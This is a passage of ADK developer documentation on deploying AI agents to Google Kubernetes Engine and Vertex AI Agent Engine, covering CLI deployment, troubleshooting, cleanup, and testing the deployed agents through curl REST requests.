You can get the external IP address of your service using: ```bash kubectl get svc adk-agent -o=jsonpath='{.status.loadBalancer.ingress[0].ip}' ``` ## Option 2: Automated Deployment using `adk deploy gke` ADK provides a CLI command to streamline GKE deployment. This avoids the need to manually build images, write Kubernetes manifests, or push to Artifact Registry. #### Prerequisites Before you begin, ensure you have the following set up: 1. **A running GKE cluster:** You need an active Kubernetes cluster on Google Cloud. 1. **Required CLIs:** - **`gcloud` CLI:** The Google Cloud CLI must be installed, authenticated, and configured to use your target project. Run `gcloud auth login` and `gcloud config set project [YOUR_PROJECT_ID]`. - **kubectl:** The Kubernetes CLI must be installed to deploy the application to your cluster. 1. **Enabled Google Cloud APIs:** Make sure the following APIs are enabled in your Google Cloud project: - Kubernetes Engine API (`container.googleapis.com`) - Cloud Build API (`cloudbuild.googleapis.com`) - Container Registry API (`containerregistry.googleapis.com`) 1. **Required IAM Permissions:** The user or Compute Engine default service account running the command needs, at a minimum, the following roles: 1. **Kubernetes Engine Developer** (`roles/container.developer`): To interact with the GKE cluster. 1. **Storage Object Viewer** (`roles/storage.objectViewer`): To allow Cloud Build to download the source code from the Cloud Storage bucket where gcloud builds submit uploads it. 1. **Artifact Registry Create on Push Writer** (`roles/artifactregistry.createOnPushWriter`): To allow Cloud Build to push the built container image to Artifact Registry. This role also permits the on-the-fly creation of the special gcr.io repository within Artifact Registry if needed on the first push. 1. **Logs Writer** (`roles/logging.logWriter`): To allow Cloud Build to write build logs to Cloud Logging. 
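Before running the deploy command, it can help to confirm that the required CLIs are on your `PATH`. The sketch below is a hypothetical helper, not part of ADK. It only checks that the `gcloud` and `kubectl` executables can be found; it does not verify authentication, enabled APIs, or the IAM roles listed above.

```python
import shutil
from typing import Callable, Iterable, List, Optional

# CLIs named in the prerequisites above.
REQUIRED_CLIS = ("gcloud", "kubectl")


def missing_clis(
    required: Iterable[str] = REQUIRED_CLIS,
    which: Callable[[str], Optional[str]] = shutil.which,
) -> List[str]:
    """Return the names of required executables that are not on PATH."""
    return [name for name in required if which(name) is None]


if __name__ == "__main__":
    missing = missing_clis()
    if missing:
        print("Missing required CLIs: " + ", ".join(missing))
    else:
        print("gcloud and kubectl were found on PATH.")
```

The `which` parameter exists only so the lookup can be replaced in tests; in normal use, call `missing_clis()` with no arguments.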
### The `deploy gke` Command The command takes the path to your agent and parameters specifying the target GKE cluster. #### Syntax ```bash adk deploy gke [OPTIONS] AGENT_PATH ``` ### Arguments & Options | Argument | Description | Required | | -------------- | ---------------------------------------------------------------------------------------- | -------- | | AGENT_PATH | The local file path to your agent's root directory. | Yes | | --project | The Google Cloud Project ID where your GKE cluster is located. | Yes | | --cluster_name | The name of your GKE cluster. | Yes | | --region | The Google Cloud region of your cluster (e.g., us-central1). | Yes | | --with_ui | Deploys both the agent's back-end API and a companion front-end user interface. | No | | --log_level | Sets the logging level for the deployment process. Options: debug, info, warning, error. | No | ### How It Works When you run the `adk deploy gke` command, the ADK performs the following steps automatically: - Containerization: It builds a Docker container image from your agent's source code. - Image Push: It tags the container image and pushes it to your project's Artifact Registry. - Manifest Generation: It dynamically generates the necessary Kubernetes manifest files (a `Deployment` and a `Service`). - Cluster Deployment: It applies these manifests to your specified GKE cluster, which triggers the following: The `Deployment` instructs GKE to pull the container image from Artifact Registry and run it in one or more Pods. The `Service` creates a stable network endpoint for your agent. By default, this is a LoadBalancer service, which provisions a public IP address to expose your agent to the internet. ### Example Usage Here is a practical example of deploying an agent located at `~/agents/multi_tool_agent/` to a GKE cluster named test. 
```bash
adk deploy gke \
    --project myproject \
    --cluster_name test \
    --region us-central1 \
    --with_ui \
    --log_level info \
    ~/agents/multi_tool_agent/
```

### Verifying Your Deployment

If you used `adk deploy gke`, verify the deployment using `kubectl`:

1. Check the Pods: Ensure your agent's pods are in the Running state.

   ```bash
   kubectl get pods
   ```

   You should see output like `adk-default-service-name-xxxx-xxxx ... 1/1 Running` in the default namespace.

1. Find the External IP: Get the public IP address for your agent's service.

   ```bash
   kubectl get service
   NAME                       TYPE           CLUSTER-IP      EXTERNAL-IP     PORT(S)        AGE
   adk-default-service-name   LoadBalancer   34.118.228.70   34.63.153.253   80:32581/TCP   5d20h
   ```

   You can then navigate to the external IP in a browser and interact with the agent through the UI.

## Testing your agent

Once your agent is deployed to GKE, you can interact with it via the deployed UI (if enabled) or directly with its API endpoints using tools like `curl`. You'll need the external IP address of the Kubernetes service, which is available after deployment.

### UI Testing

If you deployed your agent with the UI enabled:

You can test your agent by navigating to the Kubernetes service URL in your web browser.

The ADK dev UI allows you to interact with your agent, manage sessions, and view execution details directly in the browser.

To verify your agent is working as intended, you can:

1. Select your agent from the dropdown menu.
1. Type a message and verify that you receive an expected response from your agent.

If you experience any unexpected behavior, check the pod logs for your agent using:

```bash
kubectl logs -l app=adk-agent
```

### API Testing (curl)

You can interact with the agent's API endpoints using tools like `curl`. This is useful for programmatic interaction or if you deployed without the UI.

#### Set the application URL

Set `APP_URL` to the external IP address of your Kubernetes service. The following command reads it from the `adk-agent` service created by the manual deployment. If you deployed with `adk deploy gke`, use the service name shown by `kubectl get service` instead (for example, `adk-default-service-name` in the output above).
```bash export APP_URL=$(kubectl get service adk-agent -o jsonpath='{.status.loadBalancer.ingress[0].ip}') ``` #### List available apps Verify the deployed application name. ```bash curl -X GET $APP_URL/list-apps ``` *(Adjust the `app_name` in the following commands based on this output if needed. The default is often the agent directory name, e.g., `capital_agent`)*. #### Create or Update a Session Initialize or update the state for a specific user and session. Replace `capital_agent` with your actual app name if different. The values `user_123` and `session_abc` are example identifiers; you can replace them with your desired user and session IDs. ```bash curl -X POST \ $APP_URL/apps/capital_agent/users/user_123/sessions/session_abc \ -H "Content-Type: application/json" \ -d '{"preferred_language": "English", "visit_count": 5}' ``` #### Run the Agent Send a prompt to your agent. Replace `capital_agent` with your app name and adjust the user/session IDs and prompt as needed. ```bash curl -X POST $APP_URL/run_sse \ -H "Content-Type: application/json" \ -d '{ "app_name": "capital_agent", "user_id": "user_123", "session_id": "session_abc", "new_message": { "role": "user", "parts": [{ "text": "What is the capital of Canada?" }] }, "streaming": false }' ``` - Set `"streaming": true` if you want to receive Server-Sent Events (SSE). - The response will contain the agent's execution events, including the final answer. ## Troubleshooting These are some common issues you might encounter when deploying your agent to GKE: ### 403 Permission Denied for `Gemini 2.0 Flash` This usually means that the Kubernetes service account does not have the necessary permission to access the Vertex AI API. Ensure that you have created the service account and bound it to the `Vertex AI User` role as described in the [Configure Kubernetes Service Account for Vertex AI](#configure-kubernetes-service-account-for-vertex-ai) section. 
If you are using AI Studio, ensure that you have set the `GOOGLE_API_KEY` environment variable in the deployment manifest and that it is valid.

### 404 or Not Found response

This usually means there is an error in your request. Check the application logs to diagnose the problem.

```bash
export POD_NAME=$(kubectl get pod -l app=adk-agent -o jsonpath='{.items[0].metadata.name}')
kubectl logs $POD_NAME
```

### Attempt to write a readonly database

You might see that no session ID is created in the UI and the agent does not respond to any messages. This is usually caused by the SQLite database being read-only. This can happen if you run the agent locally and then build the container image, which copies the local SQLite database into the container. The database is then read-only in the container.

```bash
sqlalchemy.exc.OperationalError: (sqlite3.OperationalError) attempt to write a readonly database
[SQL: UPDATE app_states SET state=?, update_time=CURRENT_TIMESTAMP WHERE app_states.app_name = ?]
```

To fix this issue, you can either:

Delete the SQLite database file from your local machine before building the container image. A new SQLite database is then created when the container starts.

```bash
rm -f sessions.db
```

or (recommended) add a `.dockerignore` file to your project directory to exclude the SQLite database from being copied into the container image.

.dockerignore

```text
sessions.db
```

Build the container image and deploy the application again.

### Insufficient Permission to Stream Logs `ERROR: (gcloud.builds.submit)`

This error can occur when you don't have sufficient permissions to stream build logs, or when your VPC-SC security policy restricts access to the default logs bucket.

To check the progress of the build, follow the link provided in the error message or navigate to the Cloud Build page in the Google Cloud Console.
You can also verify the image was built and pushed to the Artifact Registry using the command under the [Build the container image](#build-the-container-image) section.

### Gemini-2.0-Flash Not Supported in Live API

When using the ADK Dev UI for your deployed agent, text-based chat works, but voice input (e.g., clicking the microphone button) fails. You might see a `websockets.exceptions.ConnectionClosedError` in the pod logs indicating that your model is "not supported in the live api".

This error occurs because the agent is configured with a model (like `gemini-2.0-flash` in the example) that does not support the Gemini Live API. The Live API is required for real-time, bidirectional streaming of audio and video.

## Cleanup

To delete the GKE cluster and all associated resources, run:

```bash
gcloud container clusters delete adk-cluster \
    --location=$GOOGLE_CLOUD_LOCATION \
    --project=$GOOGLE_CLOUD_PROJECT
```

To delete the Artifact Registry repository, run:

```bash
gcloud artifacts repositories delete adk-repo \
    --location=$GOOGLE_CLOUD_LOCATION \
    --project=$GOOGLE_CLOUD_PROJECT
```

You can also delete the project if you no longer need it. This will delete all resources associated with the project, including the GKE cluster, Artifact Registry repository, and any other resources you created.

```bash
gcloud projects delete $GOOGLE_CLOUD_PROJECT
```

# Deploy to Vertex AI Agent Engine

Supported in ADK: Python

Google Cloud Vertex AI [Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/overview) is a set of modular services that help developers scale and govern agents in production. The Agent Engine runtime enables you to deploy agents in production with end-to-end managed infrastructure so you can focus on creating intelligent and impactful agents. When you deploy an ADK agent to Agent Engine, your code runs in the *Agent Engine runtime* environment, which is part of the larger set of agent services provided by the Agent Engine product.
This guide includes the following deployment paths, which serve different purposes:

- **[Standard deployment](/adk-docs/deploy/agent-engine/deploy/)**: Follow this standard deployment path if you have an existing Google Cloud project and if you want to carefully manage deploying an ADK agent to the Agent Engine runtime. This deployment path uses the Cloud Console and the ADK command line interface, and provides step-by-step instructions. This path is recommended for users who are already familiar with configuring Google Cloud projects, and users preparing for production deployments.
- **[Agent Starter Pack deployment](/adk-docs/deploy/agent-engine/asp/)**: Follow this accelerated deployment path if you do not have an existing Google Cloud project and are creating a project specifically for development and testing. The Agent Starter Pack (ASP) helps you deploy ADK projects quickly and it configures Google Cloud services that are not strictly necessary for running an ADK agent with the Agent Engine runtime.

Agent Engine service on Google Cloud

Agent Engine is a paid service and you may incur costs if you go above the no-cost access tier. More information can be found on the [Agent Engine pricing page](https://cloud.google.com/vertex-ai/pricing#vertex-ai-agent-engine).

## Deployment payload

When you deploy your ADK agent project to Agent Engine, the following content is uploaded to the service:

- Your ADK agent code
- Any dependencies declared in your ADK agent code

The deployment *does not* include the ADK API server or the ADK web user interface libraries. The Agent Engine service provides the libraries for ADK API server functionality.

# Deploy to Agent Engine with Agent Starter Pack

Supported in ADK: Python

This deployment procedure describes how to perform a deployment using the [Agent Starter Pack](https://github.com/GoogleCloudPlatform/agent-starter-pack) (ASP) and the ADK command line interface (CLI) tool.
Using ASP for deployment to the Agent Engine runtime is an accelerated path, and you should use it for **development and testing** only. The ASP tool configures Google Cloud resources that are not strictly necessary for running an ADK agent workflow, and you should thoroughly review that configuration before using it in a production deployment. This deployment guide uses the ASP tool to apply a project template to your existing project, add deployment artifacts, and prepare your agent project for deployment. These instructions show you how to use ASP to provision a Google Cloud project with services needed for deploying your ADK project, as follows: - [Prerequisites](#prerequisites-ad): Setup Google Cloud account, a project, and install required software. - [Prepare your ADK project](#prepare-ad): Modify your existing ADK project files to get ready for deployment. - [Connect to your Google Cloud project](#connect-ad): Connect your development environment to Google Cloud and your Google Cloud project. - [Deploy your ADK project](#deploy-ad): Provision required services in your Google Cloud project and upload your ADK project code. For information on testing a deployed agent, see [Test deployed agent](https://google.github.io/adk-docs/deploy/agent-engine/test/index.md). For more information on using Agent Starter Pack and its command line tools, see the [CLI reference](https://googlecloudplatform.github.io/agent-starter-pack/cli/enhance.html) and [Development guide](https://googlecloudplatform.github.io/agent-starter-pack/guide/development-guide.html). ### Prerequisites You need the following resources configured to use this deployment path: - **Google Cloud account**: with administrator access to the following: - **Google Cloud Project**: An empty Google Cloud project with [billing enabled](https://cloud.google.com/billing/docs/how-to/modify-project). 
For information on creating projects, see [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects). - **Python Environment**: A Python version supported by the [ASP project](https://googlecloudplatform.github.io/agent-starter-pack/guide/getting-started.html). - **uv Tool:** Manage Python development environment and running ASP tools. For installation details, see [Install uv](https://docs.astral.sh/uv/getting-started/installation/). - **Google Cloud CLI tool**: The gcloud command line interface. For installation details, see [Google Cloud Command Line Interface](https://cloud.google.com/sdk/docs/install). - **Make tool**: Build automation tool. This tool is part of most Unix-based systems, for installation details, see the [Make tool](https://www.gnu.org/software/make/) documentation. ### Prepare your ADK project When you deploy an ADK project to Agent Engine, you need some additional files to support the deployment operation. The following ASP command backs up your project and then adds files to your project for deployment purposes. These instructions assume you have an existing ADK project that you are modifying for deployment. If you do not have an ADK project, or want to use a test project, complete the Python [Quickstart](/adk-docs/get-started/quickstart/) guide, which creates a [multi_tool_agent](https://github.com/google/adk-docs/tree/main/examples/python/snippets/get-started/multi_tool_agent) project. The following instructions use the `multi_tool_agent` project as an example. To prepare your ADK project for deployment to Agent Engine: 1. In a terminal window of your development environment, navigate to the **parent directory** that contains your agent folder. For example, if your project structure is: ```text your-project-directory/ ├── multi_tool_agent/ │ ├── __init__.py │ ├── agent.py │ └── .env ``` Navigate to `your-project-directory/` 1. 
Run the ASP `enhance` command to add the files required for deployment into your project.

   ```shell
   uvx agent-starter-pack enhance --adk -d agent_engine
   ```

1. Follow the instructions from the ASP tool. In general, you can accept the default answers to all questions. However, for the **GCP region** option, make sure you select one of the [supported regions](https://docs.cloud.google.com/agent-builder/locations#supported-regions-agent-engine) for Agent Engine.

When you successfully complete this process, the tool shows the following message:

```text
> Success! Your agent project is ready.
```

Note

The ASP tool may show a reminder to connect to Google Cloud while running, but that connection is *not required* at this stage.

For more information about the changes ASP makes to your ADK project, see [Changes to your ADK project](#adk-asp-changes).

### Connect to your Google Cloud project

Before you deploy your ADK project, you must connect to Google Cloud and your project. After logging into your Google Cloud account, you should verify that your deployment target project is visible from your account and that it is configured as your current project.

To connect to Google Cloud and list your project:

1. In a terminal window of your development environment, log in to your Google Cloud account:

   ```shell
   gcloud auth application-default login
   ```

1. Set your target project using the Google Cloud Project ID:

   ```shell
   gcloud config set project your-project-id-xxxxx
   ```

1. Verify your Google Cloud target project is set:

   ```shell
   gcloud config get-value project
   ```

Once you have successfully connected to Google Cloud and set your Cloud Project ID, you are ready to deploy your ADK project files to Agent Engine.

### Deploy your ADK project

When using the ASP tool, you deploy in stages. In the first stage, you run a `make` command that provisions the services needed to run your ADK workflow on Agent Engine.
In the second stage, the tool uploads your project code to the Agent Engine service and runs it in the hosted environment.

Important

*Make sure your Google Cloud target deployment project is set as your* **current project** *before performing these steps*. The `make backend` command uses your currently set Google Cloud project when it performs a deployment. For information on setting and checking your current project, see [Connect to your Google Cloud project](#connect-ad).

To deploy your ADK project to Agent Engine in your Google Cloud project:

1. In a terminal window, ensure you are in the parent directory (e.g., `your-project-directory/`) that contains your agent folder.

1. Deploy the code from the updated local project into the Google Cloud development environment by running the following ASP make command:

   ```shell
   make backend
   ```

Once this process completes successfully, you should be able to interact with the agent running on Google Cloud Agent Engine. For details on testing the deployed agent, see [Test deployed agent](/adk-docs/deploy/agent-engine/test/).

### Changes to your ADK project

The ASP tools add more files to your project for deployment. The ASP `enhance` command backs up your existing project files before modifying them. This guide uses the [multi_tool_agent](https://github.com/google/adk-docs/tree/main/examples/python/snippets/get-started/multi_tool_agent) project as a reference example.
The original project has the following file structure to start with: ```text multi_tool_agent/ ├─ __init__.py ├─ agent.py └─ .env ``` After running the ASP enhance command to add Agent Engine deployment information, the new structure is as follows: ```text multi-tool-agent/ ├─ app/ # Core application code │ ├─ agent.py # Main agent logic │ ├─ agent_engine_app.py # Agent Engine application logic │ └─ utils/ # Utility functions and helpers ├─ .cloudbuild/ # CI/CD pipeline configurations for Google Cloud Build ├─ deployment/ # Infrastructure and deployment scripts ├─ notebooks/ # Jupyter notebooks for prototyping and evaluation ├─ tests/ # Unit, integration, and load tests ├─ Makefile # Makefile for common commands ├─ GEMINI.md # AI-assisted development guide └─ pyproject.toml # Project dependencies and configuration ``` See the *README.md* file in your updated ADK project folder for more information. For more information on using Agent Starter Pack, see the [Development guide](https://googlecloudplatform.github.io/agent-starter-pack/guide/development-guide.html). ## Test deployed agents After completing deployment of your ADK agent you should test the workflow in its new hosted environment. For more information on testing an ADK agent deployed to Agent Engine, see [Test deployed agents in Agent Engine](/adk-docs/deploy/agent-engine/test/). # Deploy to Vertex AI Agent Engine Supported in ADKPython This deployment procedure describes how to perform a standard deployment of ADK agent code to Google Cloud [Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/overview). You should follow this deployment path if you have an existing Google Cloud project and if you want to carefully manage deploying an ADK agent to Agent Engine runtime environment. These instructions use Cloud Console, the gcloud command line interface, and the ADK command line interface (ADK CLI). 
This path is recommended for users who are already familiar with configuring Google Cloud projects, and for users preparing for production deployments.

These instructions describe how to deploy an ADK project to the Google Cloud Agent Engine runtime environment, which includes the following stages:

- [Set up Google Cloud project](#setup-cloud-project)
- [Prepare agent project folder](#define-your-agent)
- [Deploy the agent](#deploy-agent)

## Set up Google Cloud project

To deploy your agent to Agent Engine, you need a Google Cloud project:

1. **Sign into Google Cloud**:
    - If you're an **existing user** of Google Cloud:
        - Sign in to Google Cloud with your existing account.
        - If you previously used a Free Trial that has expired, you may need to upgrade to a [Paid billing account](https://docs.cloud.google.com/free/docs/free-cloud-features#how-to-upgrade).
    - If you are a **new user** of Google Cloud:
        - You can sign up for the [Free Trial program](https://docs.cloud.google.com/free/docs/free-cloud-features). The Free Trial gets you a $300 Welcome credit to spend over 91 days on various [Google Cloud products](https://docs.cloud.google.com/free/docs/free-cloud-features#during-free-trial) and you won't be billed. During the Free Trial, you also get access to the [Google Cloud Free Tier](https://docs.cloud.google.com/free/docs/free-cloud-features#free-tier), which gives you free usage of select products up to specified monthly limits, and to product-specific free trials.
1. **Create a Google Cloud project**
    - If you already have an existing Google Cloud project, you can use it, but be aware this process is likely to add new services to the project.
    - If you want to create a new Google Cloud project, you can create one on the [Create Project](https://console.cloud.google.com/projectcreate) page.
1. **Get your Google Cloud Project ID**
    - You need your Google Cloud Project ID, which you can find on your GCP homepage. Make sure to note the Project ID (alphanumeric with hyphens), *not* the project number (numeric).
1. **Enable Vertex AI in your project**
    - To use Agent Engine, you need to [enable the Vertex AI API](https://console.cloud.google.com/apis/library/aiplatform.googleapis.com). Click on the "Enable" button to enable the API. Once enabled, it should say "API Enabled".
1. **Enable Cloud Resource Manager API in your project**
    - To use Agent Engine, you need to [enable the Cloud Resource Manager API](https://console.developers.google.com/apis/api/cloudresourcemanager.googleapis.com/overview). Click on the "Enable" button to enable the API. Once enabled, it should say "API Enabled".

## Set up your coding environment

Now that you have prepared your Google Cloud project, you can return to your coding environment. These steps require access to a terminal within your coding environment to run command line instructions.

### Authenticate your coding environment with Google Cloud

- You need to authenticate your coding environment so that you and your code can interact with Google Cloud. To do so, you need the gcloud CLI. If you have never used the gcloud CLI, you need to first [download and install it](https://docs.cloud.google.com/sdk/docs/install-sdk) before continuing with the steps below.
- Run the following command in your terminal to access your Google Cloud project as a user:

    ```shell
    gcloud auth login
    ```

    After authenticating, you should see the message `You are now authenticated with the gcloud CLI!`.

- Run the following command to authenticate your code so that it can work with Google Cloud:

    ```shell
    gcloud auth application-default login
    ```

    After authenticating, you should see the message `You are now authenticated with the gcloud CLI!`.

- (Optional) If you need to set or change your default project in gcloud, you can use:

    ```shell
    gcloud config set project MY-PROJECT-ID
    ```

### Define your agent

With your Google Cloud and coding environment prepared, you're ready to deploy your agent.
The instructions assume that you have an agent project folder, such as:

```text
multi_tool_agent/
├── .env
├── __init__.py
└── agent.py
```

For more details on the project files and format, see the [multi_tool_agent](https://github.com/google/adk-docs/tree/main/examples/python/snippets/get-started/multi_tool_agent) code sample.

## Deploy the agent

You can deploy from your terminal using the `adk deploy` command line tool. This process packages your code, builds it into a container, and deploys it to the managed Agent Engine service. It can take several minutes.

The following example deploy command uses the `multi_tool_agent` sample code as the project to be deployed:

```shell
PROJECT_ID=my-project-id
LOCATION_ID=us-central1

adk deploy agent_engine \
    --project=$PROJECT_ID \
    --region=$LOCATION_ID \
    --display_name="My First Agent" \
    multi_tool_agent
```

For `region`, you can find a list of the supported regions on the [Vertex AI Agent Builder locations page](https://docs.cloud.google.com/agent-builder/locations#supported-regions-agent-engine). To learn about the CLI options for the `adk deploy agent_engine` command, see the [ADK CLI Reference](https://google.github.io/adk-docs/api-reference/cli/cli.html#adk-deploy-agent-engine).

### Deploy command output

Once successfully deployed, you should see output similar to the following:

```shell
Creating AgentEngine
Create AgentEngine backing LRO: projects/123456789/locations/us-central1/reasoningEngines/751619551677906944/operations/2356952072064073728
View progress and logs at https://console.cloud.google.com/logs/query?project=hopeful-sunset-478017-q0
AgentEngine created. Resource name: projects/123456789/locations/us-central1/reasoningEngines/751619551677906944
To use this AgentEngine in another session:
agent_engine = vertexai.agent_engines.get('projects/123456789/locations/us-central1/reasoningEngines/751619551677906944')
Cleaning up the temp folder: /var/folders/k5/pv70z5m92s30k0n7hfkxszfr00mz24/T/agent_engine_deploy_src/20251219_134245
```

The output includes the `RESOURCE_ID` of your deployed agent, which is the final segment of the resource name (`751619551677906944` in the example above). You need this ID along with the other values to use your agent on Agent Engine.

## Using an agent on Agent Engine

Once you have completed deployment of your ADK project, you can query the agent using the Vertex AI SDK, the Python requests library, or a REST API client. This section describes what you need to interact with your agent and how to construct URLs for your agent's REST API.

To interact with your agent on Agent Engine, you need the following:

- **PROJECT_ID** (example: "my-project-id"), which you can find on your [project details page](https://console.cloud.google.com/iam-admin/settings)
- **LOCATION_ID** (example: "us-central1"), which is the region you used to deploy your agent
- **RESOURCE_ID** (example: "751619551677906944"), which you can find on the [Agent Engine UI](https://console.cloud.google.com/vertex-ai/agents/agent-engines)

The query URL structure is as follows:

```shell
https://${LOCATION_ID}-aiplatform.googleapis.com/v1/projects/${PROJECT_ID}/locations/${LOCATION_ID}/reasoningEngines/${RESOURCE_ID}:query
```

You can make requests to your agent using this URL structure. For more information on how to make requests, see the instructions in the Agent Engine documentation [Use an Agent Development Kit agent](https://docs.cloud.google.com/agent-builder/agent-engine/use/adk#rest-api).
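The query URL structure can also be assembled in code from the three identifiers. The following is a minimal sketch using only the Python standard library; the helper name `build_query_url` is hypothetical and not part of ADK or the Vertex AI SDK.

```python
def build_query_url(project_id: str, location_id: str, resource_id: str) -> str:
    """Return the Agent Engine query URL for a deployed agent.

    Hypothetical helper: it only formats the URL pattern documented above.
    """
    host = f"https://{location_id}-aiplatform.googleapis.com"
    path = (
        f"/v1/projects/{project_id}/locations/{location_id}"
        f"/reasoningEngines/{resource_id}:query"
    )
    return host + path


# Example values taken from this guide.
print(build_query_url("my-project-id", "us-central1", "751619551677906944"))
```

Keeping the URL construction in one function makes it harder to mix up the location, which appears both in the host name and in the path.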
You can also check the Agent Engine documentation to learn about how to manage your [deployed agent](https://docs.cloud.google.com/agent-builder/agent-engine/manage/overview). For more information on testing and interacting with a deployed agent, see [Test deployed agents in Agent Engine](/adk-docs/deploy/agent-engine/test/). ### Monitoring and verification - You can monitor the deployment status in the [Agent Engine UI](https://console.cloud.google.com/vertex-ai/agents/agent-engines) in the Google Cloud Console. - For additional details, you can visit the Agent Engine documentation [deploying an agent](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/deploy) and [managing deployed agents](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/manage/overview). ## Test deployed agents After completing deployment of your ADK agent you should test the workflow in its new hosted environment. For more information on testing an ADK agent deployed to Agent Engine, see [Test deployed agents in Agent Engine](/adk-docs/deploy/agent-engine/test/). # Test deployed agents in Agent Engine These instructions explain how to test an ADK agent deployed to the [Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/overview) runtime environment. Before using these instructions, you need to have completed the deployment of your agent to the Agent Engine runtime environment using one of the [available methods](/adk-docs/deploy/agent-engine/). This guide shows you how to view, interact, and test your deployed agent through the Google Cloud Console, and interact with the agent using REST API calls or the Vertex AI SDK for Python. ## View deployed agent in Cloud Console To view your deployed agent in the Cloud Console: - Navigate to the Agent Engine page in the Google Cloud Console: This page lists all deployed agents in your currently selected Google Cloud project. 
If you do not see your agent listed, make sure you have your target project selected in Google Cloud Console. For more information on selecting an existing Google Cloud project, see [Creating and managing projects](https://cloud.google.com/resource-manager/docs/creating-managing-projects#identifying_projects).

## Find Google Cloud project information

You need the address and resource identifiers for your project (`PROJECT_ID`, `LOCATION_ID`, `RESOURCE_ID`) to test your deployment. You can use Cloud Console or the `gcloud` command line tool to find this information.

> **Vertex AI express mode API key:** If you are using Vertex AI express mode, you can skip this step and use your API key.

To find your project information with Google Cloud Console:

1. In the Google Cloud Console, navigate to the [Agent Engine page](https://console.cloud.google.com/vertex-ai/agents/agent-engines).
1. At the top of the page, select **API URLs**, and then copy the **Query URL** string for your deployed agent, which should be in this format:

    ```text
    https://${LOCATION_ID}-aiplatform.googleapis.com/v1/projects/${PROJECT_ID}/locations/${LOCATION_ID}/reasoningEngines/${RESOURCE_ID}:query
    ```

To find your project information with the `gcloud` command line tool:

1. In your development environment, make sure you are authenticated to Google Cloud and run the following command to list your projects:

    ```shell
    gcloud projects list
    ```

1. With the Project ID you used for deployment, run this command to get the additional details:

    ```shell
    gcloud asset search-all-resources \
        --scope=projects/${PROJECT_ID} \
        --asset-types='aiplatform.googleapis.com/ReasoningEngine' \
        --format="table(name,assetType,location,reasoning_engine_id)"
    ```

## Test using REST calls

A simple way to interact with your deployed agent in Agent Engine is to use REST calls with the `curl` tool. This section describes how to check your connection to the agent and how to test processing of a request by the deployed agent.
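Before building REST requests, it can help to split a full resource name into the identifiers listed above. The following sketch assumes the name follows the `projects/.../locations/.../reasoningEngines/...` pattern shown in the deploy output; the helper `parse_resource_name` is hypothetical, and the project segment may be a project number rather than a Project ID.

```python
import re

# Matches the resource-name pattern, optionally preceded by a service prefix
# or followed by a method suffix such as ":query".
_RESOURCE_RE = re.compile(
    r"projects/(?P<project>[^/]+)"
    r"/locations/(?P<location>[^/]+)"
    r"/reasoningEngines/(?P<resource_id>[^/:]+)"
)


def parse_resource_name(name: str) -> dict[str, str]:
    """Extract project, location, and resource ID from a resource name."""
    match = _RESOURCE_RE.search(name)
    if match is None:
        raise ValueError(f"Not a reasoning engine resource name: {name!r}")
    return match.groupdict()


parts = parse_resource_name(
    "projects/123456789/locations/us-central1/reasoningEngines/751619551677906944"
)
print(parts["location"], parts["resource_id"])
```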
### Check connection to agent

You can check your connection to the running agent using the **Query URL** available in the Agent Engine section of the Cloud Console. This check does not execute the deployed agent, but returns information about the agent.

To send a REST call and get a response from the deployed agent:

- In a terminal window of your development environment, build a request and execute it.

    With a Google Cloud project:

    ```shell
    curl -X GET \
        -H "Authorization: Bearer $(gcloud auth print-access-token)" \
        "https://${LOCATION_ID}-aiplatform.googleapis.com/v1/projects/${PROJECT_ID}/locations/${LOCATION_ID}/reasoningEngines"
    ```

    With Vertex AI express mode:

    ```shell
    curl -X GET \
        -H "x-goog-api-key:YOUR-EXPRESS-MODE-API-KEY" \
        "https://aiplatform.googleapis.com/v1/reasoningEngines"
    ```

If your deployment was successful, this request responds with a list of valid requests and expected data formats.

> **Remove the `:query` suffix for the connection URL:** If you use the **Query URL** available in the Agent Engine section of the Cloud Console, make sure to remove the `:query` suffix from the end of the address.

> **Access for agent connections:** This connection test requires that the calling user has a valid access token for the deployed agent. When testing from other environments, make sure the calling user has access to connect to the agent in your Google Cloud project.

### Send an agent request

To get responses from your agent project, you must first create a session, receive a Session ID, and then send your requests using that Session ID. This process is described in the following instructions.

To test interaction with the deployed agent via REST:

1. In a terminal window of your development environment, create a session by building a request using this template.

    With a Google Cloud project:

    ```shell
    curl \
        -H "Authorization: Bearer $(gcloud auth print-access-token)" \
        -H "Content-Type: application/json" \
        "https://${LOCATION_ID}-aiplatform.googleapis.com/v1/projects/${PROJECT_ID}/locations/${LOCATION_ID}/reasoningEngines/${RESOURCE_ID}:query" \
        -d '{"class_method": "async_create_session", "input": {"user_id": "u_123"}}'
    ```

    With Vertex AI express mode:

    ```shell
    curl \
        -H "x-goog-api-key:YOUR-EXPRESS-MODE-API-KEY" \
        -H "Content-Type: application/json" \
        "https://aiplatform.googleapis.com/v1/reasoningEngines/${RESOURCE_ID}:query" \
        -d '{"class_method": "async_create_session", "input": {"user_id": "u_123"}}'
    ```

1. In the response from the previous command, extract the created **Session ID** from the **id** field (`4857885913439920384` in this example):

    ```json
    {
        "output": {
            "userId": "u_123",
            "lastUpdateTime": 1757690426.337745,
            "state": {},
            "id": "4857885913439920384",
            "appName": "9888888855577777776",
            "events": []
        }
    }
    ```

1. In a terminal window of your development environment, send a message to your agent by building a request using this template and the Session ID created in the previous step.

    With a Google Cloud project:

    ```shell
    curl \
        -H "Authorization: Bearer $(gcloud auth print-access-token)" \
        -H "Content-Type: application/json" \
        "https://${LOCATION_ID}-aiplatform.googleapis.com/v1/projects/${PROJECT_ID}/locations/${LOCATION_ID}/reasoningEngines/${RESOURCE_ID}:query?alt=sse" \
        -d '{
        "class_method": "async_stream_query",
        "input": {
            "user_id": "u_123",
            "session_id": "4857885913439920384",
            "message": "Hey whats the weather in new york today?"
        }
    }'
    ```

    With Vertex AI express mode:

    ```shell
    curl \
        -H "x-goog-api-key:YOUR-EXPRESS-MODE-API-KEY" \
        -H "Content-Type: application/json" \
        "https://aiplatform.googleapis.com/v1/reasoningEngines/${RESOURCE_ID}:query?alt=sse" \
        -d '{
        "class_method": "async_stream_query",
        "input": {
            "user_id": "u_123",
            "session_id": "4857885913439920384",
            "message": "Hey whats the weather in new york today?"
        }
    }'
    ```

